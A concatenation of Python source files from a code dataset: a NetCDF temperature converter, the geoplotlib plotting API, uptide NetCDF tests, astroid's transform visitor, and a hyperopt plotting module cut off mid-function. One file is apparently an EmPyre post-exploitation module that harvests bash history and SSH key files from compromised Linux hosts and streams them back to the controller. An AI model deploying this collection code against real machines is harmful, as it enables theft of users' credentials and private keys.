| jbschafer/LearningLabServer | scripts/updateProgress.py | Python | gpl-2.0 | 14,443 | [
"VisIt"
] | 932fac06616a82b2bd744f7a214870e0c214f46860600d12dd504d7745715a3c |
#!/usr/bin/env python
# L. Brodeau, 2015
# Potential temperature to conservative temperature (TEOS 10)
import sys
import os
import numpy as nmp
from netCDF4 import Dataset
from string import replace
import gsw
if len(sys.argv) != 5:
print 'Usage: '+sys.argv[0]+' <Temperature_file_to_convert> <temperature_name> <Absolute_salinity_file> <salinity_name>'
sys.exit(0)
cf_temp = sys.argv[1]
cv_temp = sys.argv[2]
cf_sal = sys.argv[3]
cv_sal = sys.argv[4]
cf_out = replace(cf_temp, cv_temp, cv_temp+'_TEOS10')
os.system('rm -f '+cf_out)
os.system('cp '+cf_temp+' '+cf_out)
print '\n'
f_sal = Dataset(cf_sal) # r+ => can read and write in the file... )
vcdim = f_sal.variables[cv_sal].dimensions
cv_t = vcdim[0]; print ' *** record dimension is called "'+cv_t+'"'
Nt = f_sal.dimensions[cv_t].size ; print ' *** There are '+str(Nt)+' time records...\n'
# Inquire the shape of arrays:
nb_dim = len(vcdim)
print ' *** '+cf_sal+' has '+str(nb_dim)+' dimmensions!'
if not nb_dim in [ 2, 3, 4 ]: print ' ERROR: unsupported number of dimmensions! =>', nb_dim ; sys.exit(0)
# Opening the Netcdf output file:
f_out = Dataset(cf_out, 'r+') # r+ => can read and write in the file... )
print 'File ', cf_out, 'is open...\n'
for jt in range(Nt):
print '\n --- treating record # '+str(jt)
if nb_dim==4: xsal = f_sal.variables[cv_sal][jt,:,:,:]
if nb_dim==3: xsal = f_sal.variables[cv_sal][jt,:,:]
if nb_dim==2: xsal = f_sal.variables[cv_sal][jt,:]
# Extracting tmask at surface level:
if nb_dim==4:
xtemp = f_out.variables[cv_temp][jt,:,:,:]
f_out.variables[cv_temp][jt,:,:,:] = gsw.CT_from_pt(xsal, xtemp)
if nb_dim==3:
xtemp = f_out.variables[cv_temp][jt,:,:]
f_out.variables[cv_temp][jt,:,:] = gsw.CT_from_pt(xsal, xtemp)
if nb_dim==2:
xtemp = f_out.variables[cv_temp][jt,:]
f_out.variables[cv_temp][jt,:] = gsw.CT_from_pt(xsal, xtemp)
f_out.variables[cv_temp].long_name = 'Conservative Temperature (TEOS10) built from potential temperature'
f_sal.close()
f_out.close()
print cf_out+' sucessfully created!'
| brodeau/barakuda | python/exec/convert_pt_to_CT.py | Python | gpl-2.0 | 2,140 | [
"NetCDF"
] | ccac1e465c24bc090c0d62cc97691b01d7e9ead8da2761d3bb3d85ee7b7d620b |
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Linux PillageUser',
# list of one or more authors for the module
'Author': ['@harmj0y'],
# more verbose multi-line description of the module
'Description': ("Pillages the current user for their bash_history, ssh known hosts, "
"recent folders, etc. "),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension' : "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# list of any references/other comments
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Sleep' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : "Switch. Sleep the agent's normal interval between downloads, otherwise use one blast.",
'Required' : False,
'Value' : 'True'
},
'AllUsers' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : "Switch. Run for all users (needs root privileges!)",
'Required' : False,
'Value' : 'False'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
sleep = self.options['Sleep']['Value']
allUsers = self.options['AllUsers']['Value']
script = """
import os
# custom function to send downloac packets back
def downloadFile(path):
import os
filePath = os.path.expanduser(path)
if os.path.isfile(filePath):
offset = 0
size = os.path.getsize(filePath)
while True:
partIndex = 0
# get 512kb of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset)
partData = "%%s|%%s|%%s" %%(partIndex, filePath, encodedPart)
if not encodedPart or encodedPart == '': break
sendMessage(encodePacket(41, partData))
# if we're choosing to sleep between file part downloads
if "%(sleep)s".lower() == "true":
global minSleep
global maxSleep
minSleep = (1.0-jitter)*delay
maxSleep = (1.0+jitter)*delay
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 5120000
searchPaths = ['/.bash_history']
if "%(allUsers)s".lower() == "true":
d='/home/'
userPaths = [os.path.join(d,o) for o in os.listdir(d) if os.path.isdir(os.path.join(d,o))]
userPaths += ["/root/"]
else:
userPaths = ['~/']
for userPath in userPaths:
for searchPath in searchPaths:
#downloadFile(userPath + searchPath)
print userPath + searchPath
# grab all .ssh files
filePath = os.path.expanduser(userPath + '/.ssh/')
if os.path.exists(filePath):
sshFiles = [f for f in os.listdir(filePath) if os.path.isfile(os.path.join(filePath, f))]
for sshFile in sshFiles:
# downloadFile(userPath + '/.ssh/' + sshFile)
print userPath + '/.ssh/' + sshFile
print "pillaging complete"
""" % {'sleep': sleep, 'allUsers': allUsers}
return script
| EmpireProject/EmPyre | lib/modules/collection/linux/pillage_user.py | Python | bsd-3-clause | 4,805 | [
"BLAST"
] | 2a8f6a7780a625f58bceef04d1bd8ce68828c44ca559e99ed08eaed8577b8c4f |
import base64
import traceback
import pyglet
from geoplotlib.core import GeoplotlibApp
from core import FONT_NAME
class AppConfig:
def __init__(self):
self.reset()
def reset(self):
self.layers = []
self.bbox = None
self.savefig = None
self.tiles_provider = 'positron'
self.smoothing = False
self.map_alpha = 255
screen = pyglet.canvas.get_display().get_default_screen()
self.screen_w = int(screen.width * .9)
self.screen_h = int(screen.height * .9)
self.requested_zoom = None
_global_config = AppConfig()
def _runapp(app_config):
app = GeoplotlibApp(app_config)
try:
app.start()
except:
traceback.print_exc()
finally:
app.close()
_global_config.reset()
def show():
"""Launch geoplotlib"""
_runapp(_global_config)
def savefig(fname):
"""Launch geoplotlib, saves a screeshot and terminates"""
_global_config.savefig = fname
_runapp(_global_config)
def inline(width=900):
"""display the map inline in ipython
:param width: image width for the browser
"""
from IPython.display import Image, HTML, display, clear_output
import random
import string
import urllib
import os
while True:
fname = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(32))
if not os.path.isfile(fname + '.png'):
break
savefig(fname)
if os.path.isfile(fname + '.png'):
with open(fname + '.png', 'rb') as fin:
encoded = base64.b64encode(fin.read())
b64 = urllib.parse.quote(encoded)
image_html = "<img style='width: %dpx; margin: 0px; float: left; border: 1px solid black;' src='data:image/png;base64,%s' />" % (width, b64)
display(HTML(image_html))
os.remove(fname + '.png')
def dot(data, color=None, point_size=2, f_tooltip=None):
"""Create a dot density map
:param data: data access object
:param color: color
:param point_size: point size
:param f_tooltip: function to return a tooltip string for a point
"""
from geoplotlib.layers import DotDensityLayer
_global_config.layers.append(DotDensityLayer(data, color=color, point_size=point_size, f_tooltip=f_tooltip))
def scatter(data, color=None, point_size=2, f_tooltip=None):
"""Deprecated: use dot
"""
import warnings
warnings.warn("deprecated, use geoplotlib.dot", DeprecationWarning)
dot(data, color, point_size, f_tooltip)
def hist(data, cmap='hot', alpha=220, colorscale='sqrt', binsize=16, show_tooltip=False,
scalemin=0, scalemax=None, f_group=None, show_colorbar=True):
"""Create a 2D histogram
:param data: data access object
:param cmap: colormap name
:param alpha: color alpha
:param colorscale: scaling [lin, log, sqrt]
:param binsize: size of the hist bins
:param show_tooltip: if True, will show the value of bins on mouseover
:param scalemin: min value for displaying a bin
:param scalemax: max value for a bin
:param f_group: function to apply to samples in the same bin. Default is to count
:param show_colorbar: show colorbar
"""
from geoplotlib.layers import HistogramLayer
_global_config.layers.append(HistogramLayer(data, cmap=cmap, alpha=alpha, colorscale=colorscale,
binsize=binsize, show_tooltip=show_tooltip, scalemin=scalemin,
scalemax=scalemax, f_group=f_group, show_colorbar=show_colorbar))
def graph(data, src_lat, src_lon, dest_lat, dest_lon, linewidth=1, alpha=220, color='hot',
levels=10, color_by = None, seg_scale='log'):
"""Create a graph drawing a line between each pair of (src_lat, src_lon) and (dest_lat, dest_lon)
:param data: data access object
:param src_lat: field name of source latitude
:param src_lon: field name of source longitude
:param dest_lat: field name of destination latitude
:param dest_lon: field name of destination longitude
:param linewidth: line width
:param alpha: color alpha
:param color: color or colormap
:param levels: coloring levels
:param color_by: attribute name for color, default using node distance
:param seg_scale: coloring data segamentation sacle, 'log' or 'lin',
'lin' only used if not by distance
"""
from geoplotlib.layers import GraphLayer
_global_config.layers.append(GraphLayer(data, src_lat, src_lon, dest_lat, dest_lon, linewidth, alpha,
color,levels, color_by, seg_scale))
def shapefiles(fname, f_tooltip=None, color=None, linewidth=3, shape_type='full', encoding='utf-8', encodingErrors='strict'):
"""
Load and draws shapefiles
:param fname: full path to the shapefile
:param f_tooltip: function to generate a tooltip on mouseover
:param color: color
:param linewidth: line width
:param shape_type: either full or bbox
"""
from geoplotlib.layers import ShapefileLayer
_global_config.layers.append(ShapefileLayer(fname, f_tooltip, color, linewidth, shape_type, encoding, encodingErrors))
def voronoi(data, line_color=None, line_width=2, f_tooltip=None, cmap=None, max_area=1e4, alpha=220):
"""
Draw the voronoi tesselation of the points
:param data: data access object
:param line_color: line color
:param line_width: line width
:param f_tooltip: function to generate a tooltip on mouseover
:param cmap: color map
:param max_area: scaling constant to determine the color of the voronoi areas
:param alpha: color alpha
"""
from geoplotlib.layers import VoronoiLayer
_global_config.layers.append(VoronoiLayer(data, line_color, line_width, f_tooltip, cmap, max_area, alpha))
def delaunay(data, line_color=None, line_width=2, cmap=None, max_lenght=100):
"""
Draw a delaunay triangulation of the points
:param data: data access object
:param line_color: line color
:param line_width: line width
:param cmap: color map
:param max_lenght: scaling constant for coloring the edges
"""
from geoplotlib.layers import DelaunayLayer
_global_config.layers.append(DelaunayLayer(data, line_color, line_width, cmap, max_lenght))
def convexhull(data, col, fill=True, point_size=4):
"""
Convex hull for a set of points
:param data: points
:param col: color
:param fill: whether to fill the convexhull polygon or not
:param point_size: size of the points on the convexhull. Points are not rendered if None
"""
from geoplotlib.layers import ConvexHullLayer
_global_config.layers.append(ConvexHullLayer(data, col, fill, point_size))
def kde(data, bw, cmap='hot', method='hist', scaling='sqrt', alpha=220,
cut_below=None, clip_above=None, binsize=1, cmap_levels=10, show_colorbar=False):
"""
Kernel density estimation visualization
:param data: data access object
:param bw: kernel bandwidth (in screen coordinates)
:param cmap: colormap
:param method: if kde use KDEMultivariate from statsmodel, which provides a more accurate but much slower estimation.
If hist, estimates density applying gaussian smoothing on a 2D histogram, which is much faster but less accurate
:param scaling: colorscale, lin log or sqrt
:param alpha: color alpha
:param cut_below: densities below cut_below are not drawn
:param clip_above: defines the max value for the colorscale
:param binsize: size of the bins for hist estimator
:param cmap_levels: discretize colors into cmap_levels levels
:param show_colorbar: show colorbar
"""
from geoplotlib.layers import KDELayer
_global_config.layers.append(KDELayer(data, bw, cmap, method, scaling, alpha,
cut_below, clip_above, binsize, cmap_levels, show_colorbar))
def markers(data, marker, f_tooltip=None, marker_preferred_size=32):
"""
Draw markers
:param data: data access object
:param marker: full filename of the marker image
:param f_tooltip: function to generate a tooltip on mouseover
:param marker_preferred_size: size in pixel for the marker images
"""
from geoplotlib.layers import MarkersLayer
_global_config.layers.append(MarkersLayer(data, marker, f_tooltip, marker_preferred_size))
def geojson(filename, color='b', linewidth=1, fill=False, f_tooltip=None):
"""
Draw features described in geojson format (http://geojson.org/)
:param filename: filename of the geojson file
:param color: color for the shapes. If callable, it will be invoked for each feature, passing the properties element
:param linewidth: line width
:param fill: if fill=True the feature polygon is filled, otherwise just the border is rendered
:param f_tooltip: function to generate a tooltip on mouseover. It will be invoked for each feature, passing the properties element
"""
from geoplotlib.layers import GeoJSONLayer
_global_config.layers.append(GeoJSONLayer(filename, color=color, linewidth=linewidth, fill=fill, f_tooltip=f_tooltip))
def labels(data, label_column, color=None, font_name=FONT_NAME,
font_size=14, anchor_x='left', anchor_y='top'):
"""
Draw a text label for each sample
:param data: data access object
:param label_column: column in the data access object where the labels text is stored
:param color: color
:param font_name: font name
:param font_size: font size
:param anchor_x: anchor x
:param anchor_y: anchor y
"""
from geoplotlib.layers import LabelsLayer
_global_config.layers.append(LabelsLayer(data, label_column, color, font_name,
font_size, anchor_x, anchor_y))
def grid(lon_edges, lat_edges, values, cmap, alpha=255, vmin=None, vmax=None, levels=10, colormap_scale='lin', show_colorbar=True):
"""
Values on a uniform grid
:param lon_edges: longitude edges
:param lat_edges: latitude edges
:param values: matrix representing values on the grid
:param cmap: colormap name
:param alpha: color alpha
:param vmin: minimum value for the colormap
:param vmax: maximum value for the colormap
:param levels: number of levels for the colormap
:param colormap_scale: colormap scale
:param show_colorbar: show the colorbar in the UI
"""
from geoplotlib.layers import GridLayer
_global_config.layers.append(
GridLayer(lon_edges, lat_edges, values, cmap, alpha, vmin, vmax, levels, colormap_scale, show_colorbar))
def clear():
"""
Remove all existing layers
"""
_global_config.layers = []
def tiles_provider(tiles_provider):
"""
Set the tile provider
:param tiles_provider: either one of the built-in providers
['watercolor', 'toner', 'toner-lite', 'mapquest', 'darkmatter','positron']
or a custom provider in the form
{'url': lambda zoom, xtile, ytile: 'someurl' % (zoom, xtile, ytile),
'tiles_dir': 'mytiles',
'attribution': 'my attribution'
})
"""
_global_config.tiles_provider = tiles_provider
def add_layer(layer):
"""
Add a layer
:param layer: a BaseLayer object
"""
_global_config.layers.append(layer)
def set_bbox(bbox):
"""
Set the map bounding box
:param bbox: a BoundingBox object
"""
_global_config.bbox = bbox
def set_smoothing(smoothing):
"""
Enables OpenGL lines smoothing (antialiasing)
:param smoothing: smoothing enabled or disabled
"""
_global_config.smoothing = smoothing
def set_map_alpha(alpha):
"""
Alpha color of the map tiles
:param alpha: int between 0 and 255. 0 is completely dark, 255 is full brightness
"""
if alpha < 0 or alpha > 255:
raise Exception('invalid alpha ' + str(alpha))
_global_config.map_alpha = alpha
def set_window_size(w, h):
"""
Set the geoplotlib window size
:param w: window width
:param h: window height
"""
_global_config.screen_w = w
_global_config.screen_h = h
def request_zoom(zoom):
_global_config.requested_zoom = zoom
| andrea-cuttone/geoplotlib | geoplotlib/__init__.py | Python | mit | 12,232 | [
"Gaussian"
] | f1b40f2f66b22c3e06cc57bb82a9a8371a57ea39215ff22920c6d71d9a8fab95 |
import unittest
from uptide.netcdf_reader import NetCDFInterpolator, CoordinateError, NetCDFFile
import itertools
import os
from numpy import arange, array, ones
# function used to fill the netcdf field, has to be linear
def f(lat, lon):
return lat*10 + lon
test_file_name1 = 'tests/test_netcdf_reader1.nc'
test_file_name2 = 'tests/test_netcdf_reader2.nc'
class TestNetCDFInterpolator(unittest.TestCase):
"""Tests the uptide.netcdf.NetCDFInterpolator class"""
def setUp(self):
# it seems that many scipy installations are broken for
# netcdf writing - therefore simply committing the
# test files instead of writing them out on the fly here
return
zval = array([[f(lat, lon) for lon in arange(10.0)]
for lat in arange(10.0)])
nc = NetCDFFile(test_file_name1, 'w')
nc.createDimension('lat', 10)
nc.createDimension('lon', 10)
nc.createVariable('latitude', 'float64', ('lat', ))
nc.createVariable('longitude', 'float64', ('lon', ))
nc.variables['latitude'][:] = arange(10.0)
nc.variables['longitude'][:] = arange(10.0)
nc.createVariable('z', 'float64', ('lat', 'lon'))
nc.variables['z'][:, :] = zval
nc.createVariable('mask', 'float64', ('lat', 'lon'))
mask = ones((10, 10), dtype='float64')
mask[0:2, :] = 0.0
nc.variables['mask'][:, :] = mask
nc.createVariable('transposed_mask', 'float64', ('lon', 'lat'))
nc.variables['transposed_mask'][:, :] = mask.T
nc.close()
# same thing but without the coordinate fields and mask
nc = NetCDFFile(test_file_name2, 'w')
nc.createDimension('lat', 10)
nc.createDimension('lon', 10)
nc.createVariable('z', 'float64', ('lat', 'lon'))
nc.variables['z'][:, :] = zval
nc.close()
def tearDown(self):
# don't remove them either (see above)
return
os.remove(test_file_name1)
os.remove(test_file_name2)
pass
def _test_prepared_nci(self, nci, perm, coordinate_perm):
# first the tests common to all permutations
# point that is always inside:
xy = [[4.33, 5.2][i] for i in coordinate_perm]
self.assertEqual(nci.get_val(xy), f(4.33, 5.2))
# point outside the domain, should raise exception:
xy = [[-4.95, 8.3][i] for i in coordinate_perm]
self.assertRaises(CoordinateError, nci.get_val, xy)
if set(perm).intersection('mask', 'transposed_mask', 'mask_from_fill_value'):
# point within sea, should work as before:
xy = [[4.33, 5.2][i] for i in coordinate_perm]
self.assertAlmostEqual(nci.get_val(xy), f(4.33, 5.2))
# point between row of land and of sea points, should interpolate from nearest sea row:
xy = [[1.2, 8.3][i] for i in coordinate_perm]
self.assertAlmostEqual(nci.get_val(xy), f(2.0, 8.3))
# point inside the first two land rows, should raise exception
xy = [[0.95, 8.3][i] for i in coordinate_perm]
self.assertRaises(CoordinateError, nci.get_val, xy)
if 'ranges' in perm:
# test within the range
xy = [[2.9, 7.0][i] for i in coordinate_perm]
self.assertAlmostEqual(nci.get_val(xy), f(2.9, 7.))
# tests outside the range, should raise exception
xy = [[3.2, 0.9][i] for i in coordinate_perm]
self.assertRaises(CoordinateError, nci.get_val, xy)
xy = [[5.9, 9.0][i] for i in coordinate_perm]
self.assertRaises(CoordinateError, nci.get_val, xy)
# test a specific permutation of the calling sequence set_field, set_mask, set_ranges
# and specific coordinate_perm (lat, lon) or (lon, lat)
def _test_permutation(self, perm, coordinate_perm):
# load the netcdf created in setup()
if coordinate_perm == (0, 1):
nci = NetCDFInterpolator(test_file_name1, ('lat', 'lon'), ('latitude', 'longitude'))
else:
nci = NetCDFInterpolator(test_file_name1, ('lon', 'lat'), ('longitude', 'latitude'))
# call the methods in the order given by perm
for x in perm:
if x == 'field':
nci.set_field('z')
elif x == 'mask':
nci.set_mask('mask')
elif x == 'transposed_mask':
nci.set_mask('transposed_mask')
elif x == 'mask_from_fill_value':
nci.set_mask_from_fill_value('mask', 0.0)
elif x == 'ranges':
if coordinate_perm == (0, 1):
nci.set_ranges(((0., 4.), (2., 8.)))
else:
nci.set_ranges(((2., 8.), (0., 4.)))
else:
raise Exception("Unknown method")
# now perform all tests
if 'field' in perm:
# if 'field' is not in perm we only test reading the field from nci2
self._test_prepared_nci(nci, perm, coordinate_perm)
# now try the same for the case where the field values are stored in a separate file
nci2 = NetCDFInterpolator(test_file_name2, nci)
nci2.set_field('z')
self._test_prepared_nci(nci2, perm, coordinate_perm)
# test all permutations of the calling sequence set_field, set_mask, set_ranges
# including all permutations that only call 1 or 2 of these methods
# set_field should always be called
# also try out coordinate permutations lat, lon and lon, lat (the read nc file is lat, lon in both cases)
def test_all_permutations(self):
for n in range(1, 4):
for perm in itertools.permutations(['field', 'mask', 'ranges'], n):
for coordinate_perm in ((0, 1), (1, 0)):
self._test_permutation(perm, coordinate_perm)
def test_all_permutations_with_fill_value(self):
for n in range(1, 4):
for perm in itertools.permutations(['field', 'mask_from_fill_value', 'ranges'], n):
for coordinate_perm in ((0, 1), (1, 0)):
self._test_permutation(perm, coordinate_perm)
def test_all_permutations_with_transposed_mask(self):
for n in range(1, 4):
for perm in itertools.permutations(['field', 'transposed_mask', 'ranges'], n):
for coordinate_perm in ((0, 1), (1, 0)):
self._test_permutation(perm, coordinate_perm)
if __name__ == '__main__':
unittest.main()
| stephankramer/uptide | tests/test_netcdf_reader.py | Python | lgpl-3.0 | 6,525 | [
"NetCDF"
] | 847418e65ffe0805c3ff5fca756b67664f450fdd2b7318183b33c0bcb64a26dc |
# Copyright (c) 2015-2016, 2018 Claudiu Popa <pcmanticore@gmail.com>
# Copyright (c) 2016 Ceridwen <ceridwenv@gmail.com>
# Copyright (c) 2018 Nick Drozd <nicholasdrozd@gmail.com>
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/master/COPYING.LESSER
import collections
from functools import lru_cache
class TransformVisitor:
"""A visitor for handling transforms.
The standard approach of using it is to call
:meth:`~visit` with an *astroid* module and the class
will take care of the rest, walking the tree and running the
transforms for each encountered node.
"""
TRANSFORM_MAX_CACHE_SIZE = 10000
def __init__(self):
self.transforms = collections.defaultdict(list)
@lru_cache(maxsize=TRANSFORM_MAX_CACHE_SIZE)
def _transform(self, node):
"""Call matching transforms for the given node if any and return the
transformed node.
"""
cls = node.__class__
if cls not in self.transforms:
# no transform registered for this class of node
return node
transforms = self.transforms[cls]
for transform_func, predicate in transforms:
if predicate is None or predicate(node):
ret = transform_func(node)
# if the transformation function returns something, it's
# expected to be a replacement for the node
if ret is not None:
node = ret
if ret.__class__ != cls:
# Can no longer apply the rest of the transforms.
break
return node
def _visit(self, node):
if hasattr(node, "_astroid_fields"):
for name in node._astroid_fields:
value = getattr(node, name)
visited = self._visit_generic(value)
if visited != value:
setattr(node, name, visited)
return self._transform(node)
def _visit_generic(self, node):
if isinstance(node, list):
return [self._visit_generic(child) for child in node]
if isinstance(node, tuple):
return tuple(self._visit_generic(child) for child in node)
if not node or isinstance(node, str):
return node
return self._visit(node)
def register_transform(self, node_class, transform, predicate=None):
"""Register `transform(node)` function to be applied on the given
astroid's `node_class` if `predicate` is None or returns true
when called with the node as argument.
The transform function may return a value which is then used to
substitute the original node in the tree.
"""
self.transforms[node_class].append((transform, predicate))
def unregister_transform(self, node_class, transform, predicate=None):
"""Unregister the given transform."""
self.transforms[node_class].remove((transform, predicate))
def visit(self, module):
"""Walk the given astroid *tree* and transform each encountered node
Only the nodes which have transforms registered will actually
be replaced or changed.
"""
module.body = [self._visit(child) for child in module.body]
return self._transform(module)
| ekwoodrich/python-dvrip | env/lib/python3.5/site-packages/astroid/transforms.py | Python | mit | 3,377 | [
"VisIt"
] | d67a70256710512223729716775a5cf9d261b473b289ba101ec11300841de5ca |
"""
Functions to visualize an Experiment.
"""
__authors__ = "James Bergstra"
__license__ = "3-clause BSD License"
__contact__ = "James Bergstra <pylearn-dev@googlegroups.com>"
import math
import sys
# -- don't import this here because it locks in the backend
# and we want the unittests to be able to set the backend
##import matplotlib.pyplot as plt
import numpy as np
from . import base
from .base import miscs_to_idxs_vals
default_status_colors = {
base.STATUS_NEW: 'k',
base.STATUS_RUNNING: 'g',
base.STATUS_OK:'b',
base.STATUS_FAIL:'r'}
def algo_as_str(algo):
if isinstance(algo, basestring):
return algo
return str(algo)
def main_plot_history(trials, bandit=None, algo=None, do_show=True,
status_colors=None):
# -- import here because file-level import is too early
import matplotlib.pyplot as plt
# self is an Experiment
if status_colors is None:
status_colors = default_status_colors
Xs = trials.specs
# XXX: show the un-finished or error trials
Ys, colors = zip(*[(y, status_colors[s])
for y, s in zip(trials.losses(bandit), trials.statuses(bandit))
if y is not None])
plt.scatter(range(len(Ys)), Ys, c=colors)
plt.xlabel('time')
plt.ylabel('loss')
if bandit is not None and bandit.loss_target is not None:
plt.axhline(bandit.loss_target)
ymin = min(np.min(Ys), bandit.loss_target)
ymax = max(np.max(Ys), bandit.loss_target)
yrange = ymax - ymin
ymean = (ymax + ymin) / 2.0
plt.ylim(
ymean - 0.53 * yrange,
ymean + 0.53 * yrange,
)
best_err = trials.average_best_error(bandit)
print "avg best error:", best_err
plt.axhline(best_err, c='g')
plt.title('bandit: %s algo: %s' % (
bandit.short_str() if bandit else '-',
algo_as_str(algo)))
if do_show:
plt.show()
def main_plot_histogram(trials, bandit=None, algo=None, do_show=True):
# -- import here because file-level import is too early
import matplotlib.pyplot as plt
status_colors = default_status_colors
Xs, Ys, Ss, Cs= zip(*[(x, y, s, status_colors[s])
for (x, y, s) in zip(trials.specs, trials.losses(bandit),
trials.statuses(bandit))
if y is not None ])
# XXX: deal with ok vs. un-finished vs. error trials
print 'Showing Histogram of %i jobs' % len(Ys)
plt.hist(Ys)
plt.xlabel('loss')
plt.ylabel('frequency')
plt.title('bandit: %s algo: %s' % (
bandit.short_str() if bandit else '-',
algo_as_str(algo)))
if do_show:
plt.show()
def main_plot_vars(trials, bandit=None, do_show=True, fontsize=10,
colorize_best=None,
columns=5,
):
# -- import here because file-level import is too early
import matplotlib.pyplot as plt
idxs, vals = miscs_to_idxs_vals(trials.miscs)
losses = trials.losses()
finite_losses = [y for y in losses if y not in (None, float('inf'))]
asrt = np.argsort(finite_losses)
if colorize_best != None:
colorize_thresh = finite_losses[asrt[colorize_best + 1]]
else:
# -- set to lower than best (disabled)
colorize_thresh = finite_losses[asrt[0]] - 1
loss_min = min(finite_losses)
loss_max = max(finite_losses)
print 'finite loss range', loss_min, loss_max, colorize_thresh
loss_by_tid = dict(zip(trials.tids, losses))
def color_fn(lossval):
if lossval is None:
return (1, 1, 1)
else:
t = 4 * (lossval - loss_min) / (loss_max - loss_min + .0001)
if t < 1:
return t, 0, 0
if t < 2:
return 2-t, t-1, 0
if t < 3:
return 0, 3-t, t-2
return 0, 0, 4-t
def color_fn_bw(lossval):
if lossval in (None, float('inf')):
return (1, 1, 1)
else:
t = (lossval - loss_min) / (loss_max - loss_min + .0001)
if lossval < colorize_thresh:
return (0., 1. - t, 0.) # -- red best black worst
else:
return (t, t, t) # -- white=worst, black=best
all_labels = list(idxs.keys())
titles = ['%s (%s)' % (label, bandit.params[label].name)
for label in all_labels]
order = np.argsort(titles)
C = columns
R = int(np.ceil(len(all_labels) / float(C)))
for plotnum, varnum in enumerate(order):
#print varnum, titles[varnum]
label = all_labels[varnum]
plt.subplot(R, C, plotnum + 1)
#print '-' * 80
#print 'Node', label
# hide x ticks
ticks_num, ticks_txt = plt.xticks()
plt.xticks(ticks_num, ['' for i in xrange(len(ticks_num))])
dist_name = bandit.params[label].name
x = idxs[label]
if 'log' in dist_name:
y = np.log(vals[label])
else:
y = vals[label]
plt.title(titles[varnum], fontsize=fontsize)
c = map(color_fn_bw, [loss_by_tid[ii] for ii in idxs[label]])
if len(y):
plt.scatter(x, y, c=c)
if 'log' in dist_name:
nums, texts = plt.yticks()
plt.yticks(nums, ['%.2e' % np.exp(t) for t in nums])
if do_show:
plt.show()
if 0:
def erf(x):
"""Erf impl that doesn't require scipy.
"""
# from http://www.math.sfu.ca/~cbm/aands/frameindex.htm
# via
# http://stackoverflow.com/questions/457408/
# is-there-an-easily-available-implementation-of-erf-for-python
#
#
# save the sign of x
sign = 1
if x < 0:
sign = -1
x = abs(x)
# constants
a1 = 0.254829592
a2 = -0.284496736
a3 = 1.421413741
a4 = -1.453152027
a5 = 1.061405429
p = 0.3275911
# A&S formula 7.1.26
t = 1.0/(1.0 + p*x)
y = 1.0 - (((((a5*t + a4)*t) + a3)*t + a2)*t + a1)*t*math.exp(-x*x)
return sign*y # erf(-x) = -erf(x)
def mixed_max_erf(scores, n_valid):
scores = list(scores) # shallow copy
scores.sort() # sort the copy
scores.reverse() # reverse the order
#this is valid for classification
# where the scores are the means of Bernoulli variables.
best_mean = scores[0][0]
best_variance = best_mean * (1.0 - best_mean) / (n_valid - 1)
rval = 0.0
rval_denom = 0.0
for i, (vscore,tscore) in enumerate(scores):
mean = vscore
variance = mean * (1.0 - mean) / (n_valid - 1)
diff_mean = mean - best_mean
diff_variance = variance + best_variance
# for scores, which should approach 1, the diff here will be negative (or zero).
# so the probability of the current point being the best is the probability that
# the current gaussian puts on positive values.
assert diff_mean <= 0.0
p_current_is_best = 0.5 - 0.5 * erf(-diff_mean / math.sqrt(diff_variance))
rval += p_current_is_best * tscore
rval_denom += p_current_is_best
if p_current_is_best < 0.001:
#print 'breaking after',i, 'examples'
break
return rval / rval_denom
def mixed_max_sampled(scores, n_valid, n_samples=100, rng=None):
scores = list(scores) # shallow copy
scores.sort() # sort the copy
scores.reverse() # reverse the order
# this is valid for classification
# where the scores are the means of Bernoulli variables.
best_mean = scores[0][0]
best_variance = best_mean * (1.0 - best_mean) / (n_valid - 1)
mu = []
sigma = []
tscores = []
for i, (vscore,tscore) in enumerate(scores):
mean = vscore
variance = mean * (1.0 - mean) / (n_valid - 1)
diff_mean = mean - best_mean
diff_variance = variance + best_variance
# for scores, which should approach 1, the diff here will be negative (or zero).
# so the probability of the current point being the best is the probability that
# the current gaussian puts on positive values.
if -diff_mean / np.sqrt(diff_variance) > 3:
#print 'breaking after', len(tscores), len(scores)
break
else:
mu.append(diff_mean)
sigma.append(np.sqrt(diff_variance))
tscores.append(tscore)
if rng is None:
rng = np.random.RandomState(232342)
mu = np.asarray(mu)
sigma = np.asarray(sigma)
tscores = np.asarray(tscores)
nrml = rng.randn(n_samples, len(mu)) * sigma + mu
winners = (nrml.T == nrml.max(axis=1))
p_best_ = winners.sum(axis=0)
p_best = p_best_ / p_best_.sum()
return np.dot(p_best, t_scores), p_best
if 0:
def rexp_plot_acc(scores, n_valid, n_test, pbest_n_samples=100, rng=None):
"""
Uses the current pyplot figure to show efficiency of random experiment.
:type scores: a list of (validation accuracy, test accuracy) pairs
:param scores: results from the trials of a random experiment
:type n_valid: integer
:param n_valid: size of the validation set
:type n_test: integer
:param n_test: size of the test set
:type mixed_max: function like mixed_max_erf or mixed_max_sampled
:param mixed_max: the function to estimate the maximum of a validation sample
"""
if rng is None:
rng = np.random.RandomState(232342)
K = 1
scatter_x = []
scatter_y = []
scatter_c = []
box_x = []
log_K = 0
while K < len(scores):
n_batches_of_K = len(scores)//K
if n_batches_of_K < 2:
break
def best_score(i):
scores_i = scores[i*K:(i+1)*K]
rval= np.dot(
[tscore for (vscore,tscore) in scores_i],
